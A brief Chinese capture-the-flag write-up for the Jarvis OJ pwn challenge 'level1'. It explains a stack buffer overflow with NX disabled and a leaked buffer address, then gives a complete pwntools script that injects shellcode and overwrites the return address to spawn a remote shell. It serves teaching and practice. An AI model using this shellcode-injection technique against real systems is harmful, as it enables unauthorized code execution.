(Jarvis Oj)(Pwn) level1
首先用checksec查一下保护。几乎没开什么保护措施。关键的是NX没开,意味着栈上的数据可执行。
用ida反汇编,找到溢出点。
但这次没有找到system函数了,那么该怎么得到shell呢,发现这个函数调用了printf函数,输出了buf的地址,在结合NX保护是关闭的,那么就意味着,如果将shellcode写到buf中,函数返回时跳转到buf位置,就可以执行shellcode了,示意图如下。
写得脚本 。
1 from pwn import *
2
3 conn=remote("pwn2.jarvisoj.com","9877")
4 shellcode_addr=conn.recvuntil('?',drop=True)
5 shellcode_addr=int(shellcode_addr[12:],16)
6 pad=0x88
7 shellcode=asm(shellcraft.sh())
8 payload=shellcode.ljust(pad,'A')+"BBBB"+p32(shellcode_addr)
9 conn.sendline(payload)
10 conn.interactive();